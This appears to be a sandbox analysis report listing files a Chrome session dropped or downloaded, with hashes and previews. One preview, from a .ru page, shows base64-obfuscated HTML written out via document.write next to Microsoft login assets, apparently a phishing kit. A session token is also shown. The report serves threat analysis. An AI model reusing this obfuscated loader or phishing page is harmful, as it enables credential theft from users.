                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:994DE40B0B3A697863A88871AFDC749B
                                                                                                                                                                              SHA1:43031132A442790C549E18FE2D055AFEBC442A2C
                                                                                                                                                                              SHA-256:D5ABBAB80496DAE51D27EE7138376B91B154F05AC1508B89A8D007CFD9504F96
                                                                                                                                                                              SHA-512:8CAFE3781D7041E3EE320BB959F90C01AFD530BCC1CD373C96F979E8216D563B0833A075BB8C95B7172B50D7375C148DC720451875D09CB79D2251B7970DC39B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://auth.split.io/api/v2/auth?users=anonymous-TkQPQssWcB2GwbKug&users=f4hjM2uYpW3sKk7YR
                                                                                                                                                                              Preview:{"pushEnabled":true,"token":"eyJhbGciOiJIUzI1NiIsImtpZCI6IkRQVkE3QS44czhnaVEiLCJ0eXAiOiJKV1QifQ.eyJ4LWFibHktY2FwYWJpbGl0eSI6IntcIk5UQTJOVEE0T1RjeV9NemcyTkRFd09EUXdOdz09X2NvbnRyb2xcIjpbXCJzdWJzY3JpYmVcIl0sXCJOVEEyTlRBNE9UY3lfTXpnMk5ERXdPRFF3Tnc9PV9teVNlZ21lbnRzXCI6W1wic3Vic2NyaWJlXCJdLFwiTlRBMk5UQTRPVGN5X016ZzJOREV3T0RRd053PT1fc3BsaXRzXCI6W1wic3Vic2NyaWJlXCJdLFwiY29udHJvbF9wcmlcIjpbXCJzdWJzY3JpYmVcIixcImNoYW5uZWwtbWV0YWRhdGE6cHVibGlzaGVyc1wiXSxcImNvbnRyb2xfc2VjXCI6W1wic3Vic2NyaWJlXCIsXCJjaGFubmVsLW1ldGFkYXRhOnB1Ymxpc2hlcnNcIl19IiwieC1hYmx5LWNsaWVudElkIjoiY2xpZW50SWQiLCJleHAiOjE3MzY1MTE4MjEsImlhdCI6MTczNjUwODIyMX0.PUx6qS8yVd_00r6kRqKtN8GF0-X7i7UuHaNeUVxy2Ks","connDelay":60}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):364
                                                                                                                                                                              Entropy (8bit):4.561528284615616
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:45100DDBE4FB816CA7BA9F16F494964A
                                                                                                                                                                              SHA1:B7A62A6E65E6CBF915B895CE14952250387295D9
                                                                                                                                                                              SHA-256:CCE2184EC089BABC70DED47B8474C543F6A5FF013E4BFD9DBAE8689489BB13BA
                                                                                                                                                                              SHA-512:08D730DB7FF2E5EE9BEF496CAC3341ECDEC96D579FD034087813FC9CBC87008824EE9577409BCB6002815FD441A7A05EF1B860A6340E59AFEF5181CB2665D674
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, false, false, false, false, false);..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (537)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12557
                                                                                                                                                                              Entropy (8bit):5.331646510935339
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BB01035D46C6A426E571BDBFD5DA7B92
                                                                                                                                                                              SHA1:FCEC993F76F17508B5EB83531D3786BFA4E0AD3C
                                                                                                                                                                              SHA-256:D45FDD3B73CED06CD053F34D8F24AC9B45513EB9361AA7D2187DB437D72BC2A6
                                                                                                                                                                              SHA-512:4B8C4971D35E39B1D0E44911F4A32E281BA2D322AB16FD479E3F607849D0E3E47FDDFC1E394E1F2201675A3219A6B154DDC55CFEDDA6644692472928013A03C6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:window._itl=function(){function A(a){if(null==a)return!1;if("object"!=typeof a)return console&&console.log("invalid query"),!1;var e="";a.access?e=a.access:(a.lid&&(e="logbooks/"+a.lid),a.rid&&(e+=(a.lid?"/":"")+"reports/"+a.rid));if(a.filters){allowed=n.af.toString();for(var b in a.filters)allowed.indexOf(b)||delete a.filters[b];e+="?filters="+encodeURIComponent(JSON.stringify(a.filters))}a.citj&&(e+=(-1==e.indexOf("?")?"?":"&")+"citj="+a.citj);a.user&&(e+=(-1==e.indexOf("?")?"?":"&")+"user="+a.user);.a.callback||(a.callback=function(){});return G(e,a.callback,a.data)}function G(a,e,b){var g="function"==typeof XMLHttpRequest?new XMLHttpRequest:new XDomainRequest;g.open("post",n.query_ep+a,!0);g.onreadystatechange=function(){if(4==g.readyState){var h=500==g.status?{status:"error",message:"Internal server error",http_status:500}:""!=g.responseText?JSON.parse(g.responseText):{status:"error",message:"Internal server error",http_status:500};e(h)}};g.setRequestHeader("Content-type","applica
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 25012, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                              Entropy (8bit):7.991167861886105
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C76CDCB61242BE0A09984BEFF5045F68
                                                                                                                                                                              SHA1:6B92CF9F482FF07BC7D2D9C384B8C4F7D0D7D932
                                                                                                                                                                              SHA-256:03109BF56409719AEF6BEB2EE63A3FBDBBEC17D3F6CF686184490234B79B6E58
                                                                                                                                                                              SHA-512:5F7E9AF3B19F2E2FACA8ED0D043410880EB2BC75D41FF766F2CC2AAAC06E536D9633C8E468A1A4D817541C8A78DFF793AFC4B944EB9FAC1EC31F126E6D7F015F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/happymonkey/v14/K2F2fZZcl-9SXwl5F_C4R_OwAAr3.woff2
                                                                                                                                                                              Preview:wOF2......a........4..aL............................l...`..`..,....F.....H..]..&.....6.$..H. .....x..%.Y.)....aD..$..M_.-a..~...fKoi...6.............%"[..qI.....b`.".1g.d'..(9."..H.a....n}..^.......L[+...,...mf..C.....,v`i..t.~t.-....C.-..L..)OZ..GS.qj..P...y!....`c_.L.8...@.......R.LM.Kd:......,...rd.}G.B..IAW.Xt....v..m.W[.]ll.P...u.$...\....M..*I....] ..n.B.J.f...Qq.%(.".J.. ."U...6*..ssn..*...~Y~.b..@nWI@m!eP.e.p.ib..../..l..o.t.7..IH#.b.m0.(H..T...... G0..]..G.i.m!.`.5..r....d.....T.......`.=.#G...!......r./.F..8...Qe.z.c.....+.8P...u*e.fw..|...........3..........4..n...^............b_l........nQ...~&:e.^a..?E.....B.......z).a..+'.fJ..l.5.=..K.u.5+.......V......".."v....\.E.~.]S...t.L....kL..d.=...U......P......W{.......m*V5.:.@...2.....T.....zH=q.v..j._...l.R.S 4u{..=.;D5.D...P.D..H.j... ...3....p....P.3.....r67u*..~9..e....Y^..IQY.Y... .uF.D.m..Fh..=F3.6.....O.+.J......a...?...)..9..w6K.H.R...2....t!V.p..;..<.K./S....@.=r..Qg...s9d\.F....=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 27503
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6936
                                                                                                                                                                              Entropy (8bit):7.966000087444271
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1332FD3493B8463EFE3427C353FB5FE5
                                                                                                                                                                              SHA1:49CEF62CC06F57FAA3210206BA0EFB5FDB3922DA
                                                                                                                                                                              SHA-256:AB4AEC2EB20F798599D6C036C47576C02690D0D5DCA4C0636E056E0B220F351E
                                                                                                                                                                              SHA-512:F5E6DA9AFBFDB5F548423F98D9C75FA2663EBCF7B1409D674F9D1FD71721FF53642A3D150FA2BC5D802ED01654AE35684A57191E4C603E10E215BAE2EBFD4AFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........=.s.....)d....H.:<.....4i2..]2.{.HHBL.*..Vm..o..$.../.........`..].G.-+%.,....n"R..OmaD....EB..E...mX..3r.....".(*ni.P... S......I.R..:.......).Y]...=..D4+..hV.... .+..3...~.+)eV..e.oH#w...4x^..h..D.l......z.e.....B.6./........7...l([.....X.}Xt{..-...x..I.O..r..=.....4........L.Y.D.).|B...S.H.Bm.USq.vJN&._.5.a.h..pW6.K..m].@.fM..xg(...ok..2....=V..%...e(].&Q.).,.)..!.......F.b..).._H...a....|.z{.BtT3..>..l.0.EP.cDRD.9....4".4\r.d....kf.... ..M.?.B.).mpy)..&4...g.t....7.).WA".d).S.....Cb...^...%..f.].&E..#^._d..%A.~RV....ww.d.b.h!WTd5aK.:%_.Sr|...P..b2..?'.0.[5b.:=.:.GM..SCP..Y....q].$(A...D..\...H..../U..Ap...^...5."_.H.e.".E..]..f..j..W.b..%y+w5.+B...ce..^..)..n.....~h....G~I.#2.8h.'&.a/..I...4ha.~y.....%..R8.]..}.F..A..,k,.-.......$,...f..5.Q.b....^.nY@.Gw..+\-....=..7.....]....._^}C.K..u=..e.......9..U._n..Vm{...n*,..\PX.."qK....N......8.8~i0kC..0$..;@A..J,.V.....,....[....@..Y...RT.~.7n.7$\.o....G..+...}3..7..@.F...._a
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):20410
                                                                                                                                                                              Entropy (8bit):7.980582012022051
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                                                                                              SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                                                                                              SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                                                                                              SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                                                                                              Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):141
                                                                                                                                                                              Entropy (8bit):5.0670258006418
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E203A73A5D74F8E427FBEFF526B5CD55
                                                                                                                                                                              SHA1:9EAB15D512FF60A3E30A24D843D05FD37FFF53DB
                                                                                                                                                                              SHA-256:096E19245C81CBE956EA9DDF2FCA81519C35E28A4634EE5CA9815425E138E831
                                                                                                                                                                              SHA-512:E37361BE9645BFCCA9C8E4F97E830B48B0D93E5C8D22C13CC03D93E7B08D300A3A21F54B3412C23A7B4B11EFAA5C4C44BB5DDA407185187B0AD3534B60760E28
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"message":"Route GET:/logs/ingest?hostname=production&now=1736508220473&tags=LogDNA-Browser not found","error":"Not Found","statusCode":404}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                              Entropy (8bit):5.0830039192559076
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:96F5B26D366F47393B3FF36FE7471474
                                                                                                                                                                              SHA1:6CAA14FF7E3692BEB752734C28CBEA160C113B7A
                                                                                                                                                                              SHA-256:07B6B3D899DD69C0E9EB463E23E10E30E82588EDDF95D15D45BB505C6703A813
                                                                                                                                                                              SHA-512:970801461D6E12D7C14752B7844F1C0347650897A8C9C1540BD0CE49CABCFBF760A9B6B891DA828537F6AD49099608F205E5D47149CB71043DC9915E215E8574
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.stripe.com/v3/fingerprinted/js/trusted-types-checker-efd8cf45ce422659c098993bfc62531b.js
                                                                                                                                                                              Preview:"use strict";(window.webpackChunkStripeJSouter=window.webpackChunkStripeJSouter||[]).push([[913],{9554:function(e,n,r){r.r(n),r.d(n,{loaded:function(){return t}});var t=!0}}]);
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (7493), with CRLF line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):19969
                                                                                                                                                                              Entropy (8bit):5.880577857345087
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:110B4ED028A4597B6C37670AD5AD5430
                                                                                                                                                                              SHA1:8E0DB4C2C20284D04990F18C1CB39DA1D1AEA039
                                                                                                                                                                              SHA-256:F24DA5FB9BD29BFCC90BA1646505F388643A555CB46AC3770051F221FC7E79B7
                                                                                                                                                                              SHA-512:DA8FA3D167E2998A6E3BD4959ECEE0A4FE912DB22D41519ECADE3850371F691F20CD68DB99966F532CE9B3AF1DD14E0980BAD3152B6BA3E91AD5938801C07DA0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://6nlp.ueralawarism.ru/oqBP/
                                                                                                                                                                              Preview: Success is not in what you have, but who you are. -->....<script>....if(atob("aHR0cHM6Ly82bmxwLnVlcmFsYXdhcmlzbS5ydS9vcUJQLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTA
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):23580
                                                                                                                                                                              Entropy (8bit):7.990537110832721
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E1B3B5908C9CF23DFB2B9C52B9A023AB
                                                                                                                                                                              SHA1:FCD4136085F2A03481D9958CC6793A5ED98E714C
                                                                                                                                                                              SHA-256:918B7DC3E2E2D015C16CE08B57BCB64D2253BAFC1707658F361E72865498E537
                                                                                                                                                                              SHA-512:B2DA7EF768385707AFED62CA1F178EFC6AA14519762E3F270129B3AFEE4D3782CB991E6FA66B3B08A2F81FF7CABA0B4C34C726D952198B2AC4A784B36EB2A828
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2
                                                                                                                                                                              Preview:wOF2......\........,..[...........................z.p.`..D....e........]..B..6.$..v. .....E.K...5c[R..V.Vr!.....$....@n..P.....'%.1....."A...#H:.T.6.JL.7.g..7..x....N"..,h....R3..u.T..A.._O..f=Mu.e.....0.c.0.FV.q....m;8..J.t.-.%."....*..&..2...!\....n..]Lx..:......S/F.V.rf%..#.Uk}....X.1n..V.|.O..aC ."...#..>..n.... $;.....y.5..|>...;@..Q.D........FT...r=p.Llf...J.3..{Z.. t]Rp.N..Z..7"B..,D.0s..."o..V<...#.N.WZ...m.\......Pb....#:z...B......~w.....J.ABQ.u<.8j..m..r2.....Aq.fNY...P..c.L+......v.n..yV.w......l......H...,..2.."v.......R.V.[...s......@..L....CS..'....Z.2..o......).4.H{C.%..?.%^...#.A.]..[....._&.[~1..j.P..`.......=......[.D7h..5...s......d'.....,....?...6.;....f..(M.CV.....R..q.c.....4.6.k.V.h/..........H..?u..!mq5...9@..0YA9.M..:..reS.;._......K...\..S.^.2..Fv.l~'l..U.TN*....OXv..]..`.X1w.4E.t%a...2!.c.R.............t.'Hc...2.8...K.w..p@..T*..RZ.@..)}..*'+.7s1..... . -.....E7<...C.J.D....Iw-...u...m.K.\e..>..*....7y|{........G..d13g].t.%.y<..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 306966
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):67975
                                                                                                                                                                              Entropy (8bit):7.9963441683247325
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:842B457E172213206057BF953572A960
                                                                                                                                                                              SHA1:58FA62D1150704C71A3A8CC1BF6FCDE0B1484F8E
                                                                                                                                                                              SHA-256:9AE6F80C63E50AD1980D11C00CE0FB46E474471A3A5EB87D917354C37BF53CAC
                                                                                                                                                                              SHA-512:5E7410E8C776D3DA8FC8709F0E9E411AF8499C7073A3390BC17C5DEAFF9299969AE4F502568082FF44CDB9E32CD0F7749E3C14BF238DA53286609979F2518DE4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.intercomcdn.com/app~tooltips.a218945a.js
                                                                                                                                                                              Preview:............~.F.(....4fF!. Lp'.F#o.3..r...........h..DK..r..>.WU..4.&E%v..."..^.k.Z...N.q.U|o...[.i........wm(.].b/..'.C?...a7.......x........2......-.$.&.6..?5.....?.-.s/H.h..O..........2.U.....U...w..2.....Q.jeG.@.uO.GQu......T...M..|.........;..s....8..z......#s.~oG...$...i2..w..Q...~(^.`)+Q.z...3;~y.....%kcb.~5...A5y...E.Q...&..7`..u5X....^...H."..6&.k'.#..U-^.j._....Ali.$YX..]\\..-#.N.5...=.u.9..2....Ng.~.z.oiA........5*..............J.O.h..kW.K..O...Y]....V'.(...B?.4..%<w......M....]X.na'3.5...t.Q7..>4.. t.Mw,.y..J...i........z.hV.2..(...V.Ui.[_.'.....c.`....%`.g..y.;.......)-.M..4&u..6..v...Q.._.?:...t...c.m6z.......?.........=*.Fn<2./...b.......1....86^vl.?..nwlB..>..)u|{.nV.6.c..;.\....93.rA...-.Po~.Xo...@|...0;. ....3..&.G.c..0.Y7....o.....G`...(..F...P7:f.Kz...,h..G........6;.....hB.Hj./....j..m.f.e....m../...7:.i.m.o..4..t..Hc.@.....^A...n.Z.u.h....F......^.o.:p.....j....9.1..........j.0aR.~..vM......6..t..^...i"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):141
                                                                                                                                                                              Entropy (8bit):5.0670258006418
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C98D38510A75946B74A9D53C29CEE0A5
                                                                                                                                                                              SHA1:8F99F32FB875038BDC904199779F2B8C48E5CD9D
                                                                                                                                                                              SHA-256:224DC89738F373C7FFD9076205A680080EA42D51E218E44E71C2152CEB9F6C67
                                                                                                                                                                              SHA-512:3EB6D775B0FE261E5AF8D933D3A142E5E10D6E94003FF5A23BD745F329BE76A1D07C5F8BD1EB4A6A04023986B87E8F1834BF538A068DD7644ECB0210A50AE7BE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"message":"Route GET:/logs/ingest?hostname=production&now=1736508224526&tags=LogDNA-Browser not found","error":"Not Found","statusCode":404}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18712, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18712
                                                                                                                                                                              Entropy (8bit):7.9881935092974246
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5721A189BB30ADE6EFE90C9A7403A9C9
                                                                                                                                                                              SHA1:A0989F6525B155CDAADEE384AD6C55A5C0EFEAAA
                                                                                                                                                                              SHA-256:4678F6C81F9A7E2132F24C224A95883A5937CC34AFF06715225749CD5EE53B9E
                                                                                                                                                                              SHA-512:97B1AC82EDFCC9AF931546E49F5113724B581778DD438E8760C7E45045D80C1DB4078F17E36071F2FE92A7A7B448E77FA0B5B5E410F7FCD681EC876BB74EEAF6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/giveyouglory/v16/8QIQdiHOgt3vv4LR7ahjw9-XYf10DYc.woff2
                                                                                                                                                                              Preview:wOF2......I.......~t..H..........................`..D....s.....4..a.....6.$..X. ..@..S...}i...K..@....QTl.Q..N<..[..C..Rt...)v.q4..vl.[......sd.K.)....K...d.+.5.x..#.G.@...5.s...6...@.".uGh.#.....~l..._........TI...D.H.E...;.P...N.......5....G..B..R.._.Z c.Ax aY.........Y..H....I....$..A.............;...4.7......-l.`.%..v....8.d+VV..v.....!.@IE.....R.8.A..N....6..'|i..g.w.lba*5.BM.7.VY.Vf.?......w...M.^5...3WH.].<Q..S2.6..v../.......`..E..*.z....}U.....SK..iw....2...5..Ii..j.H.....:..$?.,Af.R..,1e.....0(O....R..:Y..........(M-.{..G...r....Pr.JvBI.eBI....).0..C..v......1-...LJ....s...t..Y.\.u.s.1...f.."eg.(... .";.]........o...K...>. 0.......8.|.z<.S..E~l.@.t...r`/.y.....|.@}..5.".p.i.m4....c.....*..*.."DaVlT.T.!_z..6..<.Xa.N..|;Esd........l{..v[m..:].q...~.!Y..k...T/.9.........[V..........Y....:.s..W....[....a|..U...e4...XS....K.5..DV...f.m.)i..R.H.*..N.Rn.".n7AIvv......&..4E.3Y.......<...rJ.J...`..z.9.Ni2No=......w.... .W..2q..K....{.R..........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):35170
                                                                                                                                                                              Entropy (8bit):7.993096534744333
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                              SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                              SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                              SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                                                                                              Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                              Entropy (8bit):4.942373347667344
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3437AADDCDF6922D623E172C2D6F9278
                                                                                                                                                                              SHA1:F69066CF20141AC93418102D3EEE7C0225B8A623
                                                                                                                                                                              SHA-256:35DCC382EB69D00369D708708CDC545F3968B68FA5BBE3E728D11FEDD04F93BB
                                                                                                                                                                              SHA-512:2DAE5C5C30C6A0E763D8128F2CE1D467EAD432E582AB4EBB68E23991DB08F57490ABC0EED805FD33FAB5503C1737D9D47D4CC1090AE15D7391593FBB295D66E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                                                                                                                              Preview:<!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (3249)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):296049
                                                                                                                                                                              Entropy (8bit):5.563454867094763
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7427605F0A857E206FC70706B44EBEF1
                                                                                                                                                                              SHA1:4FC41BADA8F2558C065E59E48CF04842788D7A70
                                                                                                                                                                              SHA-256:3C0A56709CA43A192AFB33E99B6C378DADAD53150B883C0D72678501B27F145D
